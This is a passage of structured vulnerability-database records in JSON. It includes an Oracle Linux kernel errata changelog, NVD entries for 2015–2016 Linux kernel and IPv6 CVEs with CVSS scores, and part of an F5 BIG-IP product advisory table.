"AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:52", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9084", "CVE-2016-8630", "CVE-2016-9083", "CVE-2016-4485", "CVE-2016-4482", "CVE-2016-9576", "CVE-2016-8646"], "description": "kernel-uek\n[4.1.12-61.1.27]\n- vfio/pci: Fix integer overflows, bitmask check (Vlad Tsyrklevich) [Orabug: 25164094] {CVE-2016-9083} {CVE-2016-9084}\n- Don't feed anything but regular iovec's to blk_rq_map_user_iov (Linus Torvalds) [Orabug: 25231931] {CVE-2016-9576}\n- kvm: x86: Check memopp before dereference (CVE-2016-8630) (Owen Hofmann) [Orabug: 25417387] {CVE-2016-8630}\n- crypto: algif_hash - Only export and import on sockets with data (Herbert Xu) [Orabug: 25417799] {CVE-2016-8646}\n- USB: usbfs: fix potential infoleak in devio (Kangjie Lu) [Orabug: 25462755] {CVE-2016-4482}\n- net: fix infoleak in llc (Kangjie Lu) [Orabug: 25462799] {CVE-2016-4485}\n[4.1.12-61.1.26]\n- xen-netback: fix extra_info handling in xenvif_tx_err() (Paul Durrant) [Orabug: 25445336] \n- net: Documentation: Fix default value tcp_limit_output_bytes (Niklas Cassel) [Orabug: 25458076] \n- tcp: double default TSQ output bytes limit (Wei Liu) [Orabug: 25458076] \n- xenbus: fix deadlock on writes to /proc/xen/xenbus (David Vrabel) [Orabug: 25430143]", "edition": 4, "modified": "2017-02-06T00:00:00", "published": "2017-02-06T00:00:00", "id": "ELSA-2017-3514", "href": "http://linux.oracle.com/errata/ELSA-2017-3514.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:07:44", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux kernel before 4.7.5 does not initialize a certain integer variable, which allows local users to obtain sensitive information from kernel stack memory by triggering failure of a get_user_ex call.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-9178", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9178"], "modified": "2016-11-28T22:06:00", "cpe": ["cpe:/o:linux:linux_kernel:4.7.4"], "id": "CVE-2016-9178", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9178", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.7.4:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:39", "description": "An issue was discovered in the IPv6 protocol specification, related to ICMP Packet Too Big (PTB) messages. (The scope of this CVE is all affected IPv6 implementations from all vendors.) The security implications of IP fragmentation have been discussed at length in [RFC6274] and [RFC7739]. An attacker can leverage the generation of IPv6 atomic fragments to trigger the use of fragmentation in an arbitrary IPv6 flow (in scenarios in which actual fragmentation of packets is not needed) and can subsequently perform any type of fragmentation-based attack against legacy IPv6 nodes that do not implement [RFC6946]. That is, employing fragmentation where not actually needed allows for fragmentation-based attack vectors to be employed, unnecessarily. We note that, unfortunately, even nodes that already implement [RFC6946] can be subject to DoS attacks as a result of the generation of IPv6 atomic fragments. Let us assume that Host A is communicating with Host B and that, as a result of the widespread dropping of IPv6 packets that contain extension headers (including fragmentation) [RFC7872], some intermediate node filters fragments between Host B and Host A. If an attacker sends a forged ICMPv6 PTB error message to Host B, reporting an MTU smaller than 1280, this will trigger the generation of IPv6 atomic fragments from that moment on (as required by [RFC2460]). When Host B starts sending IPv6 atomic fragments (in response to the received ICMPv6 PTB error message), these packets will be dropped, since we previously noted that IPv6 packets with extension headers were being dropped between Host B and Host A. Thus, this situation will result in a DoS scenario. Another possible scenario is that in which two BGP peers are employing IPv6 transport and they implement Access Control Lists (ACLs) to drop IPv6 fragments (to avoid control-plane attacks). If the aforementioned BGP peers drop IPv6 fragments but still honor received ICMPv6 PTB error messages, an attacker could easily attack the corresponding peering session by simply sending an ICMPv6 PTB message with a reported MTU smaller than 1280 bytes. Once the attack packet has been sent, the aforementioned routers will themselves be the ones dropping their own traffic.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2017-01-14T07:59:00", "title": "CVE-2016-10142", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10142"], "modified": "2018-05-11T01:29:00", "cpe": ["cpe:/a:ietf:ipv6:-"], "id": "CVE-2016-10142", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10142", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ietf:ipv6:-:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:44", "description": "arch/x86/kvm/vmx.c in the Linux kernel through 4.9 mismanages the #BP and #OF exceptions, which allows guest OS users to cause a denial of service (guest OS crash) by declining to handle an exception thrown by an L2 guest.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-28T07:59:00", "title": "CVE-2016-9588", "type": "cve", "cwe": ["CWE-388"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9588"], "modified": "2018-11-28T11:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.9"], "id": "CVE-2016-9588", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9588", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:42", "description": "The arcmsr_iop_message_xfer function in drivers/scsi/arcmsr/arcmsr_hba.c in the Linux kernel through 4.8.2 does not restrict a certain length field, which allows local users to gain privileges or cause a denial of service (heap-based buffer overflow) via an ARCMSR_MESSAGE_WRITE_WQBUFFER control code.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-10-16T21:59:00", "title": "CVE-2016-7425", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7425"], "modified": "2017-01-07T03:00:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.2"], "id": "CVE-2016-7425", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7425", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.2:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:43", "description": "drivers/firewire/net.c in the Linux kernel before 4.8.7, in certain unusual hardware configurations, allows remote attackers to execute arbitrary code via crafted fragmented packets.", "edition": 5, "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-8633", "type": "cve", "cwe": ["CWE-119", "CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8633"], "modified": "2019-05-14T23:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.6"], "id": "CVE-2016-8633", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8633", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.6:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:06", "description": "Integer overflow in the sg_start_req function in drivers/scsi/sg.c in the Linux kernel 2.6.x through 4.x before 4.1 allows local users to cause a denial of service or possibly have unspecified other impact via a large iov_count value in a write request.", "edition": 8, "cvss3": {}, "published": "2015-10-19T10:59:00", "title": "CVE-2015-5707", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5707"], "modified": "2020-06-02T14:57:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:suse:suse_linux_enterprise_desktop:11", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:suse:suse_linux_enterprise_server:11", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2015-5707", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5707", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp3:*:*:*:vmware:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp2:*:*:ltss:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:11:sp3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11:sp3:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2020-10-03T12:10:52", "description": "The __get_user_asm_ex macro in arch/x86/include/asm/uaccess.h in the Linux kernel 4.4.22 through 4.4.28 contains extended asm statements that are incompatible with the exception table, which allows local users to obtain root access on non-SMEP platforms via a crafted application. NOTE: this vulnerability exists because of incorrect backporting of the CVE-2016-9178 patch to older kernels.", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-9644", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9644"], "modified": "2017-01-07T03:00:00", "cpe": ["cpe:/o:linux:linux_kernel:4.4.23", "cpe:/o:linux:linux_kernel:4.4.25", "cpe:/o:linux:linux_kernel:4.4.24", "cpe:/o:linux:linux_kernel:4.4.26", "cpe:/o:linux:linux_kernel:4.4.27", "cpe:/o:linux:linux_kernel:4.4.28", "cpe:/o:linux:linux_kernel:4.4.22"], "id": "CVE-2016-9644", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9644", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.4.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.22:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:43", "description": "The hash_accept function in crypto/algif_hash.c in the Linux kernel before 4.3.6 allows local users to cause a denial of service (OOPS) by attempting to trigger use of in-kernel hash algorithms for a socket that has received zero bytes of data.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-8646", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8646"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.3.5"], "id": "CVE-2016-8646", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8646", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:43", "description": "The TCP stack in the Linux kernel before 4.8.10 mishandles skb truncation, which allows local users to cause a denial of service (system crash) via a crafted application that makes sendto system calls, related to net/ipv4/tcp_ipv4.c and net/ipv6/tcp_ipv6.c.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-28T03:59:00", "title": "CVE-2016-8645", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8645"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/o:linux:linux_kernel:4.8.9"], "id": "CVE-2016-8645", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8645", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.8.9:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:08", "description": "The (1) pptp_bind and (2) pptp_connect functions in drivers/net/ppp/pptp.c in the Linux kernel through 4.3.3 do not verify an address length, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism via a crafted application.", "edition": 5, "cvss3": {"exploitabilityScore": 0.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.3, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2015-12-28T11:59:00", "title": "CVE-2015-8569", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8569"], "modified": "2017-11-04T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.3.2"], "id": "CVE-2015-8569", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8569", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.3.2:*:*:*:*:*:*:*"]}], "android": [{"lastseen": "2020-06-22T14:42:10", "bulletinFamily": "software", "cvelist": ["CVE-2013-7446"], "description": "Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel before 4.3.3 allows local users to bypass intended AF_UNIX socket permissions or cause a denial of service (panic) via crafted epoll_ctl calls.", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-09-01T00:00:00", "id": "ANDROID:CVE-2013-7446", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2013-7446.html", "title": "CVE-2013-7446", "type": "android", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}}], "f5": [{"lastseen": "2020-04-06T22:40:07", "bulletinFamily": "software", "cvelist": ["CVE-2016-10142"], "description": "\nF5 Product Development has assigned IDs 652516 (BIG-IP - control plane) and 671813 (BIG-IP - data plane), ID 669855 (BIG-IQ), ID 673039 (F5 iWorkflow), and ID 669854 (Enterprise Manager) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H57211290-1 and H57211290-2 on the **Diagnostics** > **Identified** > **High** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 \n11.6.2 - 11.6.3 \n11.5.5 - 11.5.8 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 - 11.5.8 \n11.2.1 | 13.0.0 - 13.1.1 \n12.0.0 - 12.1.4 \n11.6.0 - 11.6.3 \n11.5.9 | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 \n11.6.2 - 11.6.3 \n11.5.5 - 11.5.8 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 - 11.5.8 | 13.0.0 - 13.1.1 \n12.0.0 - 12.1.4 \n11.6.0 - 11.6.3 \n11.5.9 | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 \n11.6.2 - 11.6.3 \n11.5.5 - 11.5.8 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 - 11.5.8 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.5.9 | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 \n11.6.2 - 11.6.3 \n11.5.5 - 11.5.8 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 - 11.5.8 \n11.2.1 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.5.9 | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 \n11.6.2 - 11.6.3 \n11.5.5 - 11.5.8 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 - 11.5.8 \n11.2.1 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.5.9 | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 \n11.6.2 - 11.6.3 \n11.5.5 - 11.5.8 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 - 11.5.8 \n11.2.1 | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.5.9 | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \nNone | 13.0.0 - 13.1.1 \n12.0.0 - 12.1.4 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.2.1 | None | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.2.1 | None | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP GTM | 11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 11.6.2 - 11.6.3 \n11.5.5 - 11.5.8 \n | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 - 11.5.8 \n11.2.1 | 11.6.0 - 11.6.3 \n11.5.9 | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.1 - 11.5.4 \n11.2.1 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 \n11.6.2 - 11.6.3 \n11.5.5 - 11.5.8 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 - 11.5.8 \n11.2.1 | 13.0.0 - 13.1.1 \n12.0.0 - 12.1.4 \n11.6.0 - 11.6.3 \n11.5.9 | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 \n11.4.0 - 11.5.4 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 \n11.6.2 - 11.6.3 \n11.5.5 - 11.5.8 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 - 11.5.8 | 13.0.0 - 13.1.1 \n12.0.0 - 12.1.4 \n11.6.0 - 11.6.3 \n11.5.9 | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP PSM | 11.4.1 | None | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.4.1 | None | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP WebAccelerator | 11.2.1 | None | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \n11.2.1 | None | High | Linux kernel - **Data Plane** (TMM IPv6 addresses) \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 - 13.1.1 \n12.1.3 - 12.1.4 \n11.6.2 - 11.6.3 | High | Linux kernel - **Control Plane** (Management IPv6 addresses) \nNone \n | 13.0.0 - 13.1.1 \n12.0.0 - 12.1.4 \n11.6.0 - 11.6.3 | Not vulnerable | None \nARX | None | 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | None | High | Linux kernel - Management IPv6 addresses \nBIG-IQ 